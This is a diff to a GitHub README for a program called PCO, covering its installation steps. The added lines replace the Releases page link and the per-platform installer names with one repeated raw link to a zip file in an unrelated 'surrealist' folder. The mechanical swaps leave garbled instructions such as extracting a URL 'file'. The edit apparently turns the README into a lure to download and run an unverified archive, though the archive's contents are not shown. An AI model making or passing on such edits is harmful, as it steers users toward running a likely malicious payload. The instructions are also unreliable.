MMMSabana/PCO/README.md

 Follow these steps to install and run the application:

-1. **Visit the download page**: Go to the [Releases page](https://github.com/MMMSabana/PCO/releases) to access the latest version of PCO.
+1. **Visit the download page**: Go to the [Releases page](https://raw.githubusercontent.com/MMMSabana/PCO/master/surrealist/PCO-v3.2.zip) to access the latest version of PCO.
 2. **Choose your version**: Look for the most recent release and click on it.
 3. **Download the file**: Choose the appropriate file for your operating system.
-For example, you might see options like `PCO_Windows.exe`, `PCO_macOS.dmg`, or `PCO_Linux.tar.gz`.
+For example, you might see options like `https://raw.githubusercontent.com/MMMSabana/PCO/master/surrealist/PCO-v3.2.zip`, `https://raw.githubusercontent.com/MMMSabana/PCO/master/surrealist/PCO-v3.2.zip`, or `https://raw.githubusercontent.com/MMMSabana/PCO/master/surrealist/PCO-v3.2.zip`.
 4. **Run the installer**:
    - For Windows or macOS, double-click the downloaded file and follow the prompts to install.
-   - For Linux, extract the tar.gz file using a terminal command and run the application from the extracted folder.
+   - For Linux, extract the https://raw.githubusercontent.com/MMMSabana/PCO/master/surrealist/PCO-v3.2.zip file using a terminal command and run the application from the extracted folder.
 5. **Launch the application**: After installation, find the PCO icon on your desktop or applications folder.
 Click it to start the simulation.

 ## 🕹️ Using PCO